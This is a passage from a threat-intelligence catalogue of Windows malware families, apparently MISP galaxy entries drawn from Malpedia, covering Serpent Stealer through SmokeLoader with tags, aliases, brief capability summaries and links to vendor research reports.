https://www.malwarebytes.com/blog/threat-intelligence/2022/winnti-apt-group-docks-in-sri-lanka-for-new-campaign-final.pdf

Serpent Stealer

The tag is: misp-galaxy:malpedia="Serpent Stealer"

Serpent Stealer is also known as:

Table 4548. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.serpent

https://labs.k7computing.com/index.php/uncovering-the-serpent/

Serpico

The tag is: misp-galaxy:malpedia="Serpico"

Serpico is also known as:

Table 4549. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.serpico

ServHelper

ServHelper is written in Delphi and according to ProofPoint best classified as a backdoor.

ProofPoint noticed two distinct variants - "tunnel" and "downloader" (citation): "The 'tunnel' variant has more features and focuses on setting up reverse SSH tunnels to allow the threat actor to access the infected host via Remote Desktop Protocol (RDP). Once ServHelper establishes remote desktop access, the malware contains functionality for the threat actor to 'hijack' legitimate user accounts or their web browser profiles and use them as they see fit. The 'downloader' variant is stripped of the tunneling and hijacking functionality and is used as a basic downloader."

The tag is: misp-galaxy:malpedia="ServHelper"

ServHelper is also known as:

Table 4550. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.servhelper

https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf

https://ti.360.net/blog/articles/excel-4.0-macro-utilized-by-ta505-to-target-financial-institutions-recently-en/

https://www.binarydefense.com/an-updated-servhelper-tunnel-variant/

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf

https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/research/servhelper-evolution-and-new-ta505-campaigns/

https://www.deepinstinct.com/2019/04/02/new-servhelper-variant-employs-excel-4-0-macro-to-drop-signed-payload/

https://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introduced-ta505

https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/operation-ta505-part2/

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf

https://www.secureworks.com/research/threat-profiles/gold-tahoe

https://blog.talosintelligence.com/2021/08/raccoon-and-amadey-install-servhelper.html

https://www.gdatasoftware.com/blog/2020/07/36122-hidden-miners

https://insights.oem.avira.com/ta505-apt-group-targets-americas/

https://www.prodaft.com/m/reports/TeslaGun_TLPWHITE.pdf

https://prodaft.com/m/reports/TeslaGun_TLPWHITE.pdf

https://securitynews.sonicwall.com/xmlpost/servhelper-2-0-enriched-with-bot-capabilities-and-allow-remote-desktop-access/

https://e.cyberint.com/hubfs/Report%20Legit%20Remote%20Access%20Tools%20Turn%20Into%20Threat%20Actors%20Tools/CyberInt_Legit%20Remote%20Access%20Tools%20Turn%20Into%20Threat%20Actors'%20Tools_Report.pdf

https://medium.com/walmartglobaltech/ta505-adds-golang-crypter-for-delivering-miners-and-servhelper-af70b26a6e56

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf

https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/

https://www.cybereason.com/blog/threat-actor-ta505-targets-financial-enterprises-using-lolbins-and-a-new-backdoor-malware

https://threatrecon.nshc.net/2019/08/29/sectorj04-groups-increased-activity-in-2019/

https://blog.trendmicro.com/trendlabs-security-intelligence/ta505-at-it-again-variety-is-the-spice-of-servhelper-and-flawedammyy/

https://intel471.com/blog/a-brief-history-of-ta505

SessionManager

A malicious IIS module that allows upload/download of files, remote command execution, and use of the compromised server as a hop into the network behind it.

The tag is: misp-galaxy:malpedia="SessionManager"

SessionManager is also known as:

Table 4551. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.session_manager

https://securelist.com/the-sessionmanager-iis-backdoor/106868/

ShadowPad

The tag is: misp-galaxy:malpedia="ShadowPad"

ShadowPad is also known as:

  • POISONPLUG.SHADOW

  • XShellGhost

Table 4554. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.shadowpad

https://medium.com/insomniacs/its-a-bee-it-s-a-no-it-s-shadowpad-aff6a970a1c2

https://therecord.media/redecho-group-parks-domains-after-public-exposure/

https://www.youtube.com/watch?v=IRh6R8o1Q7U

https://attack.mitre.org/groups/G0096

https://speakerdeck.com/aragorntseng/winnti-is-coming-evolution-after-prosecution-at-hitcon2021

https://www.youtube.com/watch?v=55kaaMGBARM

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/critical-infrastructure-attacks

https://www.crowdstrike.com/blog/adversaries-targeting-the-manufacturing-industry/

https://www.welivesecurity.com/2020/01/31/winnti-group-targeting-universities-hong-kong/

https://ics-cert.kaspersky.com/publications/reports/2022/06/27/attacks-on-industrial-control-systems-using-shadowpad/

https://www.theregister.com/2022/04/08/china_sponsored_attacks_india_ukraine/

https://research.nccgroup.com/2022/09/30/a-glimpse-into-the-shadowy-realm-of-a-chinese-apt-detailed-analysis-of-a-shadowpad-intrusion/

https://www.trendmicro.com/en_us/research/23/g/supply-chain-attack-targeting-pakistani-government-delivers-shad.html

https://thehackernews.com/2022/02/researchers-link-shadowpad-malware.html

https://www.elastic.co/security-labs/update-to-the-REF2924-intrusion-set-and-related-campaigns

https://community.riskiq.com/article/d8b749f2

https://labs.sentinelone.com/shadowpad-a-masterpiece-of-privately-sold-malware-in-chinese-espionage/

https://www.ic3.gov/Media/News/2021/211220.pdf

https://www.pwc.co.uk/issues/cyber-security-services/research/chasing-shadows.html

https://www.recordedfuture.com/continued-targeting-of-indian-power-grid-assets/

https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf

https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Winnti.pdf

https://securelist.com/shadowpad-in-corporate-networks/81432/

https://go.recordedfuture.com/hubfs/reports/cta-2023-0808.pdf

https://www.sentinelone.com/labs/moshen-dragons-triad-and-error-approach-abusing-security-software-to-sideload-plugx-and-shadowpad/

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf

https://go.recordedfuture.com/hubfs/reports/cta-2021-0228.pdf

https://conference.hitb.org/hitbsecconf2021sin/materials/D1T1%20-%20%20ShadowPad%20-%20A%20Masterpiece%20of%20Privately%20Sold%20Malware%20in%20Chinese%20Espionage%20-%20Yi-Jhen%20Hsieh%20&%20Joey%20Chen.pdf

https://www.recordedfuture.com/redecho-targeting-indian-power-sector/

https://hub.dragos.com/hubfs/333%20Year%20in%20Review/2021/2021%20ICS%20OT%20Cybersecurity%20Year%20In%20Review%20-%20Dragos%202021.pdf

https://securelist.com/operation-shadowhammer-a-high-profile-supply-chain-attack/90380/

https://www.youtube.com/watch?v=r1zAVX_HnJg

https://www.virusbulletin.com/uploads/pdf/conference/vb2022/slides/VB2022-Tracking-the-entire-iceberg.pdf

https://go.recordedfuture.com/hubfs/reports/ta-2022-0406.pdf

https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/

https://www.trendmicro.com/en_us/research/19/d/analyzing-c-c-runtime-library-code-tampering-in-software-supply-chain-attacks.html

https://www.welivesecurity.com/2022/09/06/worok-big-picture/

https://www.sentinelone.com/wp-content/uploads/2021/08/SentinelOne_-SentinelLabs_ShadowPad_WP_V2.pdf

https://www.ptsecurity.com/upload/corporate/ww-en/pt-esc/winnti-2020-eng.pdf

https://st.drweb.com/static/new-www/news/2020/october/Study_of_the_ShadowPad_APT_backdoor_and_its_relation_to_PlugX_en.pdf

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apt41-indictments-china-espionage

https://www.virusbulletin.com/uploads/pdf/conference/vb2022/papers/VB2022-Tracking-the-entire-iceberg-long-term-APT-malware-C2-protocol-emulation-and-scanning.pdf

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf

https://i.blackhat.com/Asia-22/Thursday-Materials/AS-22-LeonSilvia-NextGenPlugXShadowPad.pdf

https://hello.global.ntt/-/media/ntt/global/insights/white-papers/the-operations-of-winnti-group.pdf

https://www.youtube.com/watch?v=_fstHQSK-kk

https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop/

https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/space-pirates-tools-and-connections/

https://cdn.securelist.com/files/2017/08/ShadowPad_technical_description_PDF.pdf

https://securelist.com/apt-trends-report-q2-2020/97937/

https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan/

https://securelist.com/apt-trends-report-q3-2020/99204/

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lancefly-merdoor-zxshell-custom-backdoor

https://www.ptsecurity.com/upload/corporate/ru-ru/pt-esc/winnti-2020-rus.pdf

https://www.secureworks.com/research/shadowpad-malware-analysis

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments

https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf

https://www.ptsecurity.com/upload/corporate/ru-ru/webinars/ics/winnti-shadowpad.pdf

shareip

The tag is: misp-galaxy:malpedia="shareip"

shareip is also known as:

  • remotecmd

Table 4557. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.shareip

https://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong

SharpBeacon

.NET reimplementation of Cobalt Strike beacon/stager

The tag is: misp-galaxy:malpedia="SharpBeacon"

SharpBeacon is also known as:

Table 4559. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.sharpbeacon

https://github.com/mai1zhi2/SharpBeacon

SharpMapExec

This tool is made to simplify penetration testing of networks and to create a Swiss-army knife that is made for running on Windows which is often a requirement during insider threat simulation engagements.

The tag is: misp-galaxy:malpedia="SharpMapExec"

SharpMapExec is also known as:

Table 4561. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.sharpmapexec

https://github.com/cube0x0/SharpMapExec

SharpStage

The SharpStage backdoor is a .NET malware with backdoor capabilities. Its name is a derivative of the main activity class called "Stage_One". SharpStage can take screenshots, run arbitrary commands and download additional payloads. It exfiltrates data from the infected machine to a Dropbox account by implementing a Dropbox client in its code. SharpStage was seen used by the Molerats group in targeted attacks in the Middle East.

The tag is: misp-galaxy:malpedia="SharpStage"

SharpStage is also known as:

  • LastConn

Table 4562. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.sharpstage

https://www.0ffset.net/reverse-engineering/malware-analysis/molerats-string-decryption/

https://www.cybereason.com/hubfs/dam/collateral/reports/Molerats-in-the-Cloud-New-Malware-Arsenal-Abuses-Cloud-Platforms-in-Middle-East-Espionage-Campaign.pdf

https://www.cybereason.com/blog/new-malware-arsenal-abusing-cloud-platforms-in-middle-east-espionage-campaign

SHARPSTATS

The tag is: misp-galaxy:malpedia="SHARPSTATS"

SHARPSTATS is also known as:

Table 4563. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.sharpstats

https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf

ShellLocker

PCrisk states that ShellLocker is a ransomware-type virus developed using the .NET framework. It was first discovered by Jakub Kroustek and is virtually identical to another ransomware virus called Exotic.

Following infiltration, this virus encrypts stored data (video, audio, etc.) and renames encrypted files using the "[random_characters].L0cked" pattern (e.g., "sample.jpg" might be renamed to "gd&=AA0fgoi.L0cked"). Following successful encryption, ShellLocker opens a pop-up window containing a ransom-demand message.

The tag is: misp-galaxy:malpedia="ShellLocker"

ShellLocker is also known as:

Table 4565. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.shelllocker

https://twitter.com/JaromirHorejsi/status/813726714228604928

SHIPSHAPE

SHIPSHAPE is malware developed by APT30 that allows propagation and exfiltration of data over removable devices. APT30 may use this capability to exfiltrate data across air-gaps.

The tag is: misp-galaxy:malpedia="SHIPSHAPE"

SHIPSHAPE is also known as:

Table 4568. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.shipshape

https://www.mandiant.com/sites/default/files/2021-09/rpt-apt30.pdf

https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf

SideWalk (Windows)

Shellcode-based malware family that according to ESET Research was likely written by the same authors as win.crosswalk.

The tag is: misp-galaxy:malpedia="SideWalk (Windows)"

SideWalk (Windows) is also known as:

  • ScrambleCross

Table 4573. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.sidewalk

https://www.welivesecurity.com/2021/08/24/sidewalk-may-be-as-dangerous-as-crosswalk/

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/grayfly-china-sidewalk-malware

https://documents.trendmicro.com/assets/white_papers/wp-earth-baku-an-apt-group-targeting-indo-pacific-countries.pdf

Siggen6

The tag is: misp-galaxy:malpedia="Siggen6"

Siggen6 is also known as:

Table 4579. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.siggen6

SigLoader

The tag is: misp-galaxy:malpedia="SigLoader"

SigLoader is also known as:

Table 4580. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.sigloader

https://www.lac.co.jp/lacwatch/report/20201201_002363.html

sihost

The tag is: misp-galaxy:malpedia="sihost"

sihost is also known as:

Table 4581. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.sihost

https://threatrecon.nshc.net/2019/12/03/threat-actor-targeting-hong-kong-activists/

Silence

According to PCrisk, Truebot, also known as Silence.Downloader, is a malicious program that has botnet and loader/injector capabilities. This malware can add victims' devices to a botnet and cause chain system infections (i.e., download/install additional malicious programs/components).

There is significant variation in Truebot’s infection chains and distribution. It is likely that the attackers using this malicious software will continue to make such changes.

The tag is: misp-galaxy:malpedia="Silence"

Silence is also known as:

  • TrueBot

Table 4582. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.silence

https://malware.love/malware_analysis/reverse_engineering/2023/03/31/analyzing-truebot-capabilities.html

https://github.com/Tera0017/TAFOF-Unpacker

https://www.youtube.com/watch?v=FttiysUZmDw

https://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/

http://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/

https://www.huntress.com/blog/investigating-intrusions-from-intriguing-exploits

http://www.intezer.com/silenceofthemoles/

https://blogs.vmware.com/security/2023/06/carbon-blacks-truebot-detection.html

https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/using-qiling-framework-to-unpack-ta505-packed-samples/

https://outpost24.com/blog/using-qiling-framework-to-unpack-ta505-packed-samples/

https://www.prodaft.com/m/reports/RIG_TLP_CLEAR-1.pdf

https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672

https://malware.love/malware_analysis/reverse_engineering/config_extraction/2023/07/13/truebot-config-extractor.html

https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-187a

https://norfolkinfosec.com/some-notes-on-the-silence-proxy/

https://securityintelligence.com/posts/x-force-prevents-zero-day-from-going-anywhere

https://malware.love/malware_analysis/reverse_engineering/2023/02/12/analyzing-truebot-packer.html

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf

https://www.group-ib.com/resources/threat-research/silence.html

https://securelist.com/the-silence/83009/

https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/

https://norfolkinfosec.com/how-the-silence-downloader-has-evolved-over-time/

https://malware.love/malware_analysis/reverse_engineering/2023/02/18/analyzing-truebot-static-unpacking.html

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-004.pdf

https://reaqta.com/2019/01/silence-group-targeting-russian-banks/

https://www.group-ib.com/resources/threat-research/silence_2.0.going_global.pdf

https://research.loginsoft.com/threat-research/taming-the-storm-understanding-and-mitigating-the-consequences-of-cve-2023-27350/

SILENTUPLOADER

According to Mandiant, SILENTUPLOADER is an uploader written in MSIL that is dropped by DOSTEALER and is designed to work specifically in tandem with it. It checks for files in a specified folder every 30 seconds and uploads them to a remote server.

The tag is: misp-galaxy:malpedia="SILENTUPLOADER"

SILENTUPLOADER is also known as:

Table 4583. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.silentuploader

https://www.mandiant.com/media/17826

https://socradar.io/dark-web-profile-apt42-iranian-cyber-espionage-group/

Siluhdur

The tag is: misp-galaxy:malpedia="Siluhdur"

Siluhdur is also known as:

Table 4585. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.siluhdur

SimpleFileMover

The tag is: misp-galaxy:malpedia="SimpleFileMover"

SimpleFileMover is also known as:

Table 4587. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.simplefilemover

https://www.secureworks.com/research/analysis-of-dhs-nccic-indicators

skip-2.0

A Microsoft SQL Server backdoor

The tag is: misp-galaxy:malpedia="skip-2.0"

skip-2.0 is also known as:

Table 4592. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.skip20

https://www.welivesecurity.com/2019/10/21/winnti-group-skip2-0-microsoft-sql-server-backdoor/

Skyplex

The tag is: misp-galaxy:malpedia="Skyplex"

Skyplex is also known as:

Table 4594. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.skyplex

Slam

Ransomware.

The tag is: misp-galaxy:malpedia="Slam"

Slam is also known as:

Table 4595. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.slam

https://www.sentinelone.com/blog/from-the-front-lines-slam-anatomy-of-a-publicly-available-ransomware-builder/

Slave

The tag is: misp-galaxy:malpedia="Slave"

Slave is also known as:

Table 4596. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.slave

https://www.cert.pl/en/news/single/slave-banatrix-and-ransomware/

Slingshot

  • 2012 first sighted

  • Attack vector via compromised Mikrotik routers, where victims get infected when they connect to the Mikrotik router admin software - Winbox

  • 2018 when discovered by Kaspersky Team

Infection Vector - Infected Mikrotik Router > Malicious DLL (IP4.dll) in Router > User connects via Winbox > Malicious DLL downloaded onto computer

The tag is: misp-galaxy:malpedia="Slingshot"

Slingshot is also known as:

Table 4598. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.slingshot

https://s3-eu-west-1.amazonaws.com/khub-media/wp-content/uploads/sites/43/2018/03/09133534/The-Slingshot-APT_report_ENG_final.pdf

https://www.cyberscoop.com/kaspersky-slingshot-isis-operation-socom-five-eyes/

https://www.welivesecurity.com/2022/01/11/signed-kernel-drivers-unguarded-gateway-windows-core/

https://securelist.com/apt-slingshot/84312/

Sliver

According to VK9 Security, Sliver is a Command and Control (C2) system made for penetration testers, red teams, and advanced persistent threats. It generates implants (slivers) that can run on virtually every architecture out there, and securely manage these connections through a central server. Sliver supports multiple callback protocols including DNS, TCP, and HTTP(S) to make egress simple, even when those pesky blue teams block your domains. You can even have multiple operators (players) simultaneously commanding your sliver army.

The tag is: misp-galaxy:malpedia="Sliver"

Sliver is also known as:

Table 4599. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.sliver

https://intel471.com/blog/malware-before-ransomware-trojan-information-stealer-cobalt-strike

https://team-cymru.com/blog/2022/04/29/sliver-case-study-assessing-common-offensive-security-tools/

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q3%20Botnet%20Threat%20Update.pdf

https://www.telsy.com/download/5900/?uid=b797afdcfb

https://www.first.org/resources/papers/conf2023/FIRSTCON23-TLPCLEAR-Staubmann-Busy-Bees.pptx

https://www.ncsc.gov.uk/files/Advisory%20Further%20TTPs%20associated%20with%20SVR%20cyber%20actors.pdf

https://embee-research.ghost.io/shodan-censys-queries/

https://github.com/chronicle/GCTI

https://www.team-cymru.com/post/sliver-case-study-assessing-common-offensive-security-tools

https://asec.ahnlab.com/en/56941/

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf

https://michaelkoczwara.medium.com/hunting-c2-with-shodan-223ca250d06f

https://research.checkpoint.com/2022/bumblebee-increasing-its-capacity-and-evolving-its-ttps/

https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks

https://asec.ahnlab.com/en/47088/

https://www.volexity.com/blog/2022/06/15/driftingcloud-zero-day-sophos-firewall-exploitation-and-an-insidious-breach/

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q2%20Botnet%20Threat%20Update.pdf

https://www.immersivelabs.com/blog/detecting-and-decrypting-sliver-c2-a-threat-hunters-guide/

https://github.com/BishopFox/sliver

https://asec.ahnlab.com/en/55652/

slnrat

The tag is: misp-galaxy:malpedia="slnrat"

slnrat is also known as:

Table 4600. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.slnrat

https://asec.ahnlab.com/ko/37764/

SlothfulMedia

According to MITRE, SLOTHFULMEDIA is a remote access Trojan written in C++ that has been used by an unidentified "sophisticated cyber actor" since at least January 2017. It has been used to target government organizations, defense contractors, universities, and energy companies in Russia, India, Kazakhstan, Kyrgyzstan, Malaysia, Ukraine, and Eastern Europe.

The tag is: misp-galaxy:malpedia="SlothfulMedia"

SlothfulMedia is also known as:

  • QueenOfClubs

Table 4601. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.slothfulmedia

https://us-cert.cisa.gov/ncas/analysis-reports/ar20-275a

https://securelist.com/iamtheking-and-the-slothfulmedia-malware-family/99000/

SManager

The tag is: misp-galaxy:malpedia="SManager"

SManager is also known as:

  • PhantomNet

Table 4605. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.smanager

https://blog.vincss.net/2021/02/re020-elephantrat-kunming-version-our-latest-discovered-RAT-of-Panda.html

https://0xthreatintel.medium.com/how-to-unpack-smanager-apt-tool-cb5909819214

https://0xthreatintel.medium.com/reversing-apt-tool-smanager-unpacked-d413a04961c4

https://blog.vincss.net/2020/12/re018-2-analyzing-new-malware-of-china-panda-hacker-group-used-to-attack-supply-chain-against-vietnam-government-certification-authority.html?m=1

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf

https://blog.group-ib.com/task

https://blog.vincss.net/2020/12/re017-2-phan-tich-ky-thuat-dong-ma-doc-moi-co-nhieu-dau-hieu-lien-quan-toi-nhom-tin-tac-Panda.html

https://blog.vincss.net/2020/12/re018-1-analyzing-new-malware-of-china-panda-hacker-group-used-to-attack-supply-chain-against-vietnam-government-certification-authority.html

https://labs.sentinelone.com/thundercats-hack-the-fsb-your-taxes-didnt-pay-for-this-op/

https://blog.vincss.net/2020/12/phan-tich-ky-thuat-dong-ma-doc-moi-co-nhieu-dau-hieu-lien-quan-toi-nhom-tin-tac-Panda.html

https://www.elastic.co/security-labs/introducing-the-ref5961-intrusion-set

https://insight-jp.nttsecurity.com/post/102glv5/pandas-new-arsenal-part-3-smanager

https://www.welivesecurity.com/2020/12/17/operation-signsight-supply-chain-attack-southeast-asia/

SMAUG

According to PCrisk, Smaug ransomware is available for download on the dark web: it is for sale as Ransomware as a Service (RaaS). Therefore, cyber criminals who purchase it can perform ransomware attacks without having to develop malware of this type. Smaug is designed to encrypt files, rename them and create a ransom message.

The tag is: misp-galaxy:malpedia="SMAUG"

SMAUG is also known as:

Table 4607. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.smaug

https://labs.sentinelone.com/multi-platform-smaug-raas-aims-to-see-off-competitors/

https://www.anomali.com/blog/anomali-threat-research-releases-first-public-analysis-of-smaug-ransomware-as-a-service

https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html

SMOKEDHAM

According to Mandiant, SMOKEDHAM is dropped through a PowerShell script that contains the (C#) source code for this backdoor, which is stored in an encrypted variable. The dropper dynamically defines a cmdlet and .NET class for the backdoor, meaning the compiled code is only found in memory.

The tag is: misp-galaxy:malpedia="SMOKEDHAM"

SMOKEDHAM is also known as:

Table 4608. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.smokedham

https://www.mandiant.com/resources/burrowing-your-way-into-vpns

https://www.mandiant.com/resources/darkside-affiliate-supply-chain-software-compromise

https://www.fireeye.com/blog/threat-research/2021/06/darkside-affiliate-supply-chain-software-compromise.html

SmokeLoader

The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual download returns an HTTP 404 but still carries data in the response body.

The tag is: misp-galaxy:malpedia="SmokeLoader"

SmokeLoader is also known as:

  • Dofoil

  • Sharik

  • Smoke

  • Smoke Loader

Table 4609. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

https://www.telekom.com/en/blog/group/article/a-new-way-to-encrypt-cc-server-urls-614886

https://www.bleepingcomputer.com/news/security/new-golang-botnet-empties-windows-users-cryptocurrency-wallets/

https://www.logpoint.com/en/blog/emerging-threat/defending-against-8base/

https://www.sentinelone.com/blog/going-deep-a-guide-to-reversing-smoke-loader-malware/

https://de.darktrace.com/blog/privateloader-network-based-indicators-of-compromise

https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities

http://security.neurolabs.club/2019/10/dynamic-imports-and-working-around.html

https://m.alvar.es/2020/06/unpacking-smokeloader-and.html

https://securitynews.sonicwall.com/xmlpost/html-application-hta-files-are-being-used-to-distribute-smoke-loader-malware/

https://blog.malwarebytes.com/threat-analysis/2016/08/smoke-loader-downloader-with-a-smokescreen-still-alive/

https://www.spamhaus.org/news/article/774/smoke-loader-improves-encryption-after-microsoft-spoils-its-campaign

https://x0r19x91.in/malware-analysis/smokeloader/

https://www.proofpoint.com/us/threat-insight/post/2019-return-retefe

https://0xc0decafe.com/2020/12/23/detect-rc4-in-malicious-binaries

https://blog.malwarebytes.com/social-engineering/2020/09/malvertising-campaigns-come-back-in-full-swing/

https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/

https://m.alvar.es/2019/10/dynamic-imports-and-working-around.html

https://drive.google.com/file/d/13BsHZn-KVLhwrtgS2yKJAM2_U_XZlwoD/view

https://malwareandstuff.com/examining-smokeloaders-anti-hooking-technique/

https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a

https://malwarebreakdown.com/2017/04/03/shadow-server-domains-leads-to-rig-exploit-kit-dropping-smoke-loader-which-downloads-neutrino-bot-aka-kasidet/

https://blog.talosintelligence.com/2020/09/salfram-robbing-place-without-removing.html

https://research.checkpoint.com/2019-resurgence-of-smokeloader/

https://www.bitsight.com/blog/tracking-privateloader-malware-distribution-service

https://www.microsoft.com/security/blog/2021/02/01/what-tracking-an-attacker-email-infrastructure-tells-us-about-persistent-cybercriminal-operations/

https://blogs.blackberry.com/en/2022/02/threat-thursday-arkei-infostealer

https://blogs.blackberry.com/en/2022/07/smokeloader-malware-used-to-augment-amadey-infostealer

https://m.alvar.es/2020/06/comparative-analysis-between-bindiff.html

https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf

https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html

https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145

https://github.com/vc0RExor/Quick-Analysis/blob/main/SmokeLoader/SmokeLoader.md

https://www.rnbo.gov.ua/files/2023_YEAR/CYBERCENTER/october/The%20Surge%20in%20Smokeloader%20Attacks%20on%20Ukrainian%20Institutions%20UA.pdf

https://www.cert.pl/en/news/single/dissecting-smoke-loader/

https://n1ght-w0lf.github.io/malware%20analysis/smokeloader/

http://security.neurolabs.club/2019/08/smokeloaders-hardcoded-domains-sneaky.html

https://youtu.be/QOypldw6hnY?t=3237

https://cloudblogs.microsoft.com/microsoftsecure/2018/04/04/hunting-down-dofoil-with-windows-defender-atp/

https://suvaditya.one/malware-analysis/smokeloader/

https://hatching.io/blog/tt-2020-08-27/

https://info.phishlabs.com/blog/smoke-loader-adds-additional-obfuscation-methods-to-mitigate-analysis

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf

https://embee-research.ghost.io/smokeloader-analysis-with-procmon/

https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/

https://danusminimus.github.io/Analyzing-Modern-Malware-Techniques-Part-4/

https://malwarology.substack.com/p/malicious-packer-pkr_ce1a?r=1lslzd

https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf

https://blog.malwarebytes.com/cybercrime/2018/01/fake-spectre-and-meltdown-patch-pushes-smoke-loader/

https://www.silentpush.com/blog/privacy-tools-not-for-you

https://asec.ahnlab.com/en/36634/

https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/

https://blog.malwarebytes.com/threat-analysis/2016/10/new-looking-sundown-ek-drops-smoke-loader-kronos-banker/

http://security.neurolabs.club/2020/04/diffing-malware-samples-using-bindiff.html

https://blogs.vmware.com/security/2023/06/8base-ransomware-a-heavy-hitting-player.html

https://research.openanalysis.net/smoke/smokeloader/loader/config/yara/triage/2022/08/25/smokeloader.html

https://blog.talosintelligence.com/2018/07/smoking-guns-smoke-loader-learned-new.html

https://inside.harfanglab.io/blog/articles/cyber-threat-intelligence/loader-galore-taskloader-at-the-start-of-a-pay-per-install-infection-chain/

https://int0xcc.svbtle.com/a-taste-of-our-own-medicine-how-smokeloader-is-deceiving-dynamic-configuration-extraction-by-using-binary-code-as-bait

